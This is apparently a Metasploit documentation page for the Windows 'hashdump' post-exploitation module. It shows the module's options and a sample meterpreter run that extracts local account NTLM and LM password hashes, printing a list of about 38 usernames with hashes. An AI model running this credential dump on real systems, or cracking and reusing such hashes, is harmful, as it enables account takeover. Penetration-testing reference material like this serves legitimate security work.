Description
This module will dump the local user accounts from the SAM database using the registry.
| Platform | Windows |
| Author | Metasploit |
| License | BSD 3-Clause |
| URL | hashdump.rb |
Usage
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module onExamples
run post/windows/gather/hashdump
Here are the results of running this command from a meterpreter session.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 2609c40b5e36c810763cbc8bf8962276...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e0d68f3bf01ad13902472922c3921dad:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
SROCAdmin:1008:aad3b435b51404eeaad3b435b51404ee:2e920723943f81ec0af0fd735f737fef:::
antivirus:1009:aad3b435b51404eeaad3b435b51404ee:47f0ca5913c6e70090d7b686afb9e13e:::
slopez:1010:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
aparker:1011:aad3b435b51404eeaad3b435b51404ee:9b5684b030226a1203e4e7b718a3f9df:::
rgray:1012:aad3b435b51404eeaad3b435b51404ee:23d26a03aa7102abce4805d88e568a78:::
wrobinson:1013:aad3b435b51404eeaad3b435b51404ee:5deaec4b57b859c25cdd0513fb7bc750:::
mlara:1014:aad3b435b51404eeaad3b435b51404ee:d8d9eee954da5f2d42fe72f862fa493f:::
lstout:1015:aad3b435b51404eeaad3b435b51404ee:ca3f0e9ce3188b0602742da2976d6773:::
tandersen:1016:aad3b435b51404eeaad3b435b51404ee:bf459116e5854e34031997be8e13596d:::
awalker:1017:aad3b435b51404eeaad3b435b51404ee:fe1f27a2561b61511588b0d24e333a7c:::
mmiller:1018:aad3b435b51404eeaad3b435b51404ee:7a1f1fd59eb2b97041c74748ea6a68f8:::
vcollins:1019:aad3b435b51404eeaad3b435b51404ee:5bd9b7b6fce76d3aabfebee9debaa932:::
jrivera:1020:aad3b435b51404eeaad3b435b51404ee:baa90a3ad89d359009ce5425063dff3e:::
hhopkins:1021:aad3b435b51404eeaad3b435b51404ee:92929561b2758f409df2b4a24a59c6f4:::
kcooper:1022:aad3b435b51404eeaad3b435b51404ee:5ae44bf0a1e24c0b1ec96708f30e7b84:::
ksutton:1023:aad3b435b51404eeaad3b435b51404ee:a6051a02b7a2bfb4cd0e2c1a9cb4a694:::
rduarte:1024:aad3b435b51404eeaad3b435b51404ee:7ce56170c73f9582fa348db88de2c192:::
dwilliams:1025:aad3b435b51404eeaad3b435b51404ee:c6fd7d8bb36d8862c1b978896a6bec51:::
nramos:1026:aad3b435b51404eeaad3b435b51404ee:0f46bafd2c4acdac0003a1ff4da92625:::
abates:1027:aad3b435b51404eeaad3b435b51404ee:62a56ba1b94193d7f553b895bca28292:::
khansen:1028:aad3b435b51404eeaad3b435b51404ee:fc9fdcdbf09c5be4928287e4ad847dd7:::
vberry:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
cgentry:1030:aad3b435b51404eeaad3b435b51404ee:059db5a4061f5a2cb5053e753f9664b4:::
sbates:1031:aad3b435b51404eeaad3b435b51404ee:4f8bfa5d78d7a6398915c9657cd49769:::
dbryant:1032:aad3b435b51404eeaad3b435b51404ee:858bf9272facf23b3593f609e5b64c06:::
srichardson:1033:aad3b435b51404eeaad3b435b51404ee:819dc07ca50e1729d72214e8e9ee8f3a:::
kkennedy:1034:aad3b435b51404eeaad3b435b51404ee:7c3acf216ef4ec061b9330e0ad103c35:::
scook:1035:aad3b435b51404eeaad3b435b51404ee:2d474458480f9aa524ba3ebb1f3f9e6e:::
pmartin:1036:aad3b435b51404eeaad3b435b51404ee:98f9db311936bea281e9a65f45dd1f62:::
egeorge:1037:aad3b435b51404eeaad3b435b51404ee:f482c3342543f49df31a5a240a0558cf:::
phorne:1038:aad3b435b51404eeaad3b435b51404ee:b9a04517b70e549f8b2e4153ee8f4107:::
ckhan:1039:aad3b435b51404eeaad3b435b51404ee:aff059fe35c553548f56db9c85b2d90c:::
dmckenzie:1040:aad3b435b51404eeaad3b435b51404ee:50a173c77e22c87c419cacb5e0629b52:::Blog Posts